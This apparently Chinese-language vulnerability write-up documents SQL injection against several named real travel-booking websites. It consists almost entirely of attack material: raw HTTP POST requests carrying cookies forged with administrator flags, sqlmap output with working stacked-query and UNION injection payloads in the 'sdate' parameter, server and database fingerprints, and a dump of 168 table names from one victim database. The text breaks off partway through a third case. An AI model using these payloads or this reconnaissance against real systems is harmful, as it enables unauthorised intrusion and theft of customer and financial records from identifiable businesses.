8WAh8ABV9Db3B5cmlnaHQgJmNvcHk7IDIwMTQgaGhjbC5oLWguY29tLmNuIGFsbCByaWdodHMgcmVzZXJ2ZWQuIOWMl+S6rOa1t+WNjuiIquepuuacjeWKoeaciemZkOWFrOWPuGRkAgMPDxYCHwAFMeWcsOWdgO+8muWMl+S6rOW4guS4nOWfjuWMuuWuieW+t+i3r+eUsjEw5Y+3NS0xMDVkZAIFDw8WAh8ABSvnlLXor53vvJowMTAtNTE2NjIzNTUg5Lyg55yf77yaMDEwLTUxNjY4NDUwZGRk4UujVOiCDJV2KQ5W5yFZ6G/3beyhOf/bYa5kUT9h2TE=&__EVENTVALIDATION=/wEWCgK9/auVBgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCeTSLOOzN+p6XI9xcDsnWThoLwdkvHSo1F18f358pUJd&sdate=2015-6-15') UNION ALL SELECT NULL,CHAR(113)+CHAR(118)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(119)+CHAR(85)+CHAR(81)+CHAR(114)+CHAR(88)+CHAR(69)+CHAR(65)+CHAR(66)+CHAR(71)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=717
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: haihua_pek
[168 tables]
+---------------------+
| Airways             |
| Bank                |
| CW_out              |
| D99_REG             |
| D99_Tmp             |
| Hotel_City          |
| Hotel_LandMarks     |
| Hotel_OrderInfo     |
| Hotel_PageSumInfo   |
| Hotel_SingleAvail   |
| Hotel_StaticInfos   |
| Invoice             |
| MybunkMessage       |
| Notebook            |
| OtherParm           |
| PayOut              |
| Report_mb           |
| Report_mb_member    |
| Roles               |
| Roles_flag          |
| System_Warn         |
| System_info         |
| Tplanetype          |
| Visor               |
| Wage_tab            |
| admin               |
| air                 |
| air_cab_class       |
| aircity             |
| airpiao             |
| b2b_users           |
| bm_login            |
| books               |
| bx_base             |
| bx_product          |
| cardnumjl           |
| cgimg               |
| cjr_login           |
| cjrcard             |
| company_bm          |
| company_center      |
| company_clk         |
| company_flag        |
| company_logo        |
| company_news        |
| company_sms         |
| contact_info        |
| cw_gd               |
| cwkou               |
| dbbak_history       |
| fax_send            |
| fax_submit          |
| ft_City             |
| ft_Config           |
| ft_TAPrice          |
| gjqz                |
| gjqz_f              |
| gjticket            |
| hccity              |
| hcsheng             |
| hcsite              |
| hf_history          |
| hide_flight         |
| hotel               |
| huoche              |
| jbitem              |
| jp_detail           |
| jp_line             |
| kefu                |
| kefu_files          |
| kefu_mail           |
| kefubm              |
| kq_history          |
| kq_items            |
| ldt_history         |
| link                |
| lv_items            |
| lv_items_mb         |
| lv_orders_mx        |
| lv_sclass           |
| member              |
| member_sales        |
| member_sales_his    |
| member_table        |
| member_yu           |
| menu_b              |
| menu_s              |
| message_mb          |
| money_mx            |
| money_other         |
| news_read           |
| oa_item             |
| oa_main             |
| orders_design       |
| otherclass          |
| pay_money           |
| pay_money_main      |
| pay_money_other     |
| payfs               |
| piaobei             |
| piaodian            |
| piaodian_yu         |
| plane_xinhao        |
| pnr                 |
| pnr_history         |
| pnrdetail           |
| postMain            |
| postRe              |
| ptype_set           |
| resms               |
| room                |
| salestable          |
| sfk_submit          |
| sfk_submit_mx       |
| sfkmx_other_view    |
| sfkmx_view          |
| shop_bigclass       |
| shop_order          |
| shop_product        |
| shop_smallclass     |
| sms                 |
| sms_key             |
| soupiaoren          |
| sys_nav             |
| system_tx           |
| tourbig             |
| tourclass           |
| tourday             |
| tourline            |
| tourlist            |
| tournews            |
| tourorder           |
| traininfo           |
| travel_item         |
| travel_money        |
| travel_order        |
| travel_order_detail |
| tuipiao             |
| view_cw             |
| view_hctuipiao      |
| view_js             |
| view_kefu           |
| view_kq_history     |
| view_ldhistory      |
| view_member_yu      |
| view_pay_mx_main    |
| view_piaodian_yu    |
| view_scgq           |
| view_travel_order   |
| view_tuipiao        |
| viewbmpnr           |
| viewcjr             |
| viewgjticket        |
| viewhc              |
| viewother           |
| viewpnr             |
| wtOrderDetails      |
| wtOrders            |
| wtgroup             |
| wttgclass           |
| xcd_ps_main         |
| yc_group            |
| yjbooks             |
| zc_class            |
| zc_list             |
| zclist              |
| zy_class            |
| zy_zclist           |
+---------------------+

案例二：http://www.4008836868.com/
POST /Financial/fksq_meb.aspx HTTP/1.1
Host: www.4008836868.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.4008836868.com/Financial/fksq_meb.aspx
Cookie: ASP.NET_SessionId=4tsndy41ilydo2ck4gem5ewy; tktcookie=memberid=3274&truename=asdaskdj&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3515
__VIEWSTATE=%2FwEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUIYXNkYXNrZGpkZAIFDw8WAh8ABQw0MDAtODgzLTY4NjhkZAIHDxYCHgdWaXNpYmxlZxYCAgEPDxYCHwAFDUFkbWluaXN0cmF0b3JkZAIJDw8WBB4LTmF2aWdhdGVVcmwFFH4vU3lzdGVtL215aW5mby5hc3B4HwAFDOaIkeeahOS%2FoeaBr2RkAgsPDxYEHwIFEn4vbWVtYmVyL2V4aXQuYXNweB8ABQzlronlhajpgIDlh7pkZAINDxYCHwAFpQ48bGk%2BPGEgaHJlZj0iIyI%2B57O757uf566h55CGPC9hPjxpIGNsYXNzPSJpY28wMiI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9TeXN0ZW0vbXlpbmZvLmFzcHgiPsK3IOS8geS4muS%2FoeaBrzwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0dyb3VwLmFzcHgiPsK3IOmDqOmXqOWIhue7hDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0ZsYWcuYXNweCI%2Bwrcg6KeS6Imy5p2D6ZmQPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9tZW1iZXIvUGVyc29ubmVsLmFzcHgiPsK3IOWRmOW3peeuoeeQhjwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B5beu5peF6aKE5a6aPC9hPjxpIGNsYXNzPSJpY28wMyI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9GbGlnaHQvIj7CtyDlm73lhoXmnLrnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZsaWdodF9pbnQvIj7CtyDlm73pmYXmnLrnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0hvdGVsLyI%2Bwrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6K6i5Y2V5p%2Bl6K%2BiPC9hPjxpIGNsYXNzPSJpY28wNCI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI%2Bwrcg6aOe5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI%2Bwrcg6aOe5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI%2Bwrcg562%2B6K%2BBPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI%2Bwrcg5L%2Bd6ZmpPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI%2Bwrcg5YW25a6DPC9hPjwvbGk%2BPC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E%2BPGkgY2xhc3M9ImljbzA3Ij48L2k%2BPHVsIGNsYXNzPSJzdWItbmF2Ij48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n%2BiuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI%2Bwrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk%2BPC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWBgIBDw8WAh8ABTlDb3B5cmlnaHQgJmNvcHk7IDIwMTQgNDAwODgzNjg2OC5jb20gYWxsIHJpZ2h0cyByZXNlcnZlZC5kZAIDDw8WAh8ABUnlnLDlnYDvvJrkuIrmtbfluILplb%2FlroHljLrlu7blronopb%2Fot68zOTTlvIQ45Y%2B36IGU5oGS5ZWG5Lia5aSn5Y6mNjAz5a6kZGQCBQ8PFgIfAAUr55S16K%2Bd77yaNDAwLTg4My02ODY4IOS8oOecn%2B%2B8mjAyMS01MTY4NTIwNmRkZAZx33S%2BJIcoJtcT6y34LMTk1eNnPAY56WO7oiOInRDo&__EVENTVALIDATION=%2FwEWCgKg%2Fa2kAQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCXHNZ42f4qO60mvtrzDdYNphu0TTEXtyny8Gn6twQzgZ&sdate=2015-6-15&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=3274

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=/wEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUIYXNkYXNrZGpkZAIFDw8WAh8ABQw0MDAtODgzLTY4NjhkZAIHDxYCHgdWaXNpYmxlZxYCAgEPDxYCHwAFDUFkbWluaXN0cmF0b3JkZAIJDw8WBB4LTmF2aWdhdGVVcmwFFH4vU3lzdGVtL215aW5mby5hc3B4HwAFDOaIkeeahOS/oeaBr2RkAgsPDxYEHwIFEn4vbWVtYmVyL2V4aXQuYXNweB8ABQzlronlhajpgIDlh7pkZAINDxYCHwAFpQ48bGk+PGEgaHJlZj0iIyI+57O757uf566h55CGPC9hPjxpIGNsYXNzPSJpY28wMiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9TeXN0ZW0vbXlpbmZvLmFzcHgiPsK3IOS8geS4muS/oeaBrzwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0dyb3VwLmFzcHgiPsK3IOmDqOmXqOWIhue7hDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0ZsYWcuYXNweCI+wrcg6KeS6Imy5p2D6ZmQPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9tZW1iZXIvUGVyc29ubmVsLmFzcHgiPsK3IOWRmOW3peeuoeeQhjwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF6aKE5a6aPC9hPjxpIGNsYXNzPSJpY28wMyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GbGlnaHQvIj7CtyDlm73lhoXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZsaWdodF9pbnQvIj7CtyDlm73pmYXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0hvdGVsLyI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5p+l6K+iPC9hPjxpIGNsYXNzPSJpY28wNCI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI+wrcg562+6K+BPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI+wrcg5L+d6ZmpPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI+wrcg5YW25a6DPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E+PGkgY2xhc3M9ImljbzA3Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n+iuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI+wrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk+PC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWBgIBDw8WAh8ABTlDb3B5cmlnaHQgJmNvcHk7IDIwMTQgNDAwODgzNjg2OC5jb20gYWxsIHJpZ2h0cyByZXNlcnZlZC5kZAIDDw8WAh8ABUnlnLDlnYDvvJrkuIrmtbfluILplb/lroHljLrlu7blronopb/ot68zOTTlvIQ45Y+36IGU5oGS5ZWG5Lia5aSn5Y6mNjAz5a6kZGQCBQ8PFgIfAAUr55S16K+d77yaNDAwLTg4My02ODY4IOS8oOecn++8mjAyMS01MTY4NTIwNmRkZAZx33S+JIcoJtcT6y34LMTk1eNnPAY56WO7oiOInRDo&__EVENTVALIDATION=/wEWCgKg/a2kAQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCXHNZ42f4qO60mvtrzDdYNphu0TTEXtyny8Gn6twQzgZ&sdate=2015-6-15');WAITFOR DELAY '0:0:10'--&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=3274
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: __VIEWSTATE=/wEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUIYXNkYXNrZGpkZAIFDw8WAh8ABQw0MDAtODgzLTY4NjhkZAIHDxYCHgdWaXNpYmxlZxYCAgEPDxYCHwAFDUFkbWluaXN0cmF0b3JkZAIJDw8WBB4LTmF2aWdhdGVVcmwFFH4vU3lzdGVtL215aW5mby5hc3B4HwAFDOaIkeeahOS/oeaBr2RkAgsPDxYEHwIFEn4vbWVtYmVyL2V4aXQuYXNweB8ABQzlronlhajpgIDlh7pkZAINDxYCHwAFpQ48bGk+PGEgaHJlZj0iIyI+57O757uf566h55CGPC9hPjxpIGNsYXNzPSJpY28wMiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9TeXN0ZW0vbXlpbmZvLmFzcHgiPsK3IOS8geS4muS/oeaBrzwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0dyb3VwLmFzcHgiPsK3IOmDqOmXqOWIhue7hDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0ZsYWcuYXNweCI+wrcg6KeS6Imy5p2D6ZmQPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9tZW1iZXIvUGVyc29ubmVsLmFzcHgiPsK3IOWRmOW3peeuoeeQhjwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF6aKE5a6aPC9hPjxpIGNsYXNzPSJpY28wMyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GbGlnaHQvIj7CtyDlm73lhoXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZsaWdodF9pbnQvIj7CtyDlm73pmYXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0hvdGVsLyI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5p+l6K+iPC9hPjxpIGNsYXNzPSJpY28wNCI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI+wrcg562+6K+BPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI+wrcg5L+d6ZmpPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI+wrcg5YW25a6DPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E+PGkgY2xhc3M9ImljbzA3Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n+iuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI+wrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk+PC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWBgIBDw8WAh8ABTlDb3B5cmlnaHQgJmNvcHk7IDIwMTQgNDAwODgzNjg2OC5jb20gYWxsIHJpZ2h0cyByZXNlcnZlZC5kZAIDDw8WAh8ABUnlnLDlnYDvvJrkuIrmtbfluILplb/lroHljLrlu7blronopb/ot68zOTTlvIQ45Y+36IGU5oGS5ZWG5Lia5aSn5Y6mNjAz5a6kZGQCBQ8PFgIfAAUr55S16K+d77yaNDAwLTg4My02ODY4IOS8oOecn++8mjAyMS01MTY4NTIwNmRkZAZx33S+JIcoJtcT6y34LMTk1eNnPAY56WO7oiOInRDo&__EVENTVALIDATION=/wEWCgKg/a2kAQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCXHNZ42f4qO60mvtrzDdYNphu0TTEXtyny8Gn6twQzgZ&sdate=2015-6-15') UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(108)+CHAR(78)+CHAR(114)+CHAR(73)+CHAR(78)+CHAR(104)+CHAR(114)+CHAR(118)+CHAR(114)+CHAR(75)+CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=3274
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
current database:    'PiaoYou_james'

案例三：http://travel.piaoyou.org

POST //Financial/fksq_meb.aspx HTTP/1.1
Host: travel.piaoyou.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://travel.piaoyou.org//Financial/fksq_meb.aspx
Cookie: ASP.NET_SessionId=gahoq4vgqy1up25s1exqex2m; tktcookie=memberid=36&truename=alksdlk&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3893
__VIEWSTATE=%2FwEPDwUKMTE2MDQ5NzAwMQ9kFgICAw9kFgYCAQ9kFgwCAw8PFgIeBFRleHQFB2Fsa3NkbGtkZAIFDw8WAh8ABQwwMjEtNjc4MDAyMjdkZAIHDxYCHgdWaXNpYmxlZxYCAgEPDxYCHwAFDUFkbWluaXN0cmF0b3JkZAIJDw8WBB4LTmF2aWdhdGVVcmwFFH4vU3lzdGVtL215aW5mby5hc3B4HwAFDOaIkeeahOS%2FoeaBr2RkAgsPDxYEHwIFEn4vbWVtYmVyL2V4aXQuYXNweB8ABQzlronlhajpgIDlh7pkZAINDxYCHwAFoA88bGk%2BPGEgaHJlZj0iIyI%2B57O757uf566h55CGPC9hPjxpIGNsYXNzPSJpY28wMyI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9TeXN0ZW0vbXlpbmZvLmFzcHgiPsK3IOS8geS4muS%2FoeaBrzwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0dyb3VwLmFzcHgiPsK3IOmDqOmXqOWIhue7hDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0ZsYWcuYXNweCI%2Bwrcg6KeS6Imy5p2D6ZmQPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9tZW1iZXIvUGVyc29ubmVsLmFzcHgiPsK3IOWRmOW3peeuoeeQhjwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B5beu5peF6aKE5a6aPC9hPjxpIGNsYXNzPSJpY28wMiI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9GbGlnaHQvIj7CtyDlm73lhoXmnLrnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZsaWdodF9pbnQvIj7CtyDlm73pmYXmnLrnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0hvdGVsLyI%2Bwrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6K6i5Y2V5p%2Bl6K%2BiPC9hPjxpIGNsYXNzPSJpY28wNCI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI%2Bwrcg6aOe5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvUmV0dXJuLmFzcHgiPsK3IOmAgOelqOiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvc2NncV9saXN0LmFzcHgiPsK3IOWNh%2BiIseaUueacn%2BiusOW9lTwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6K6i5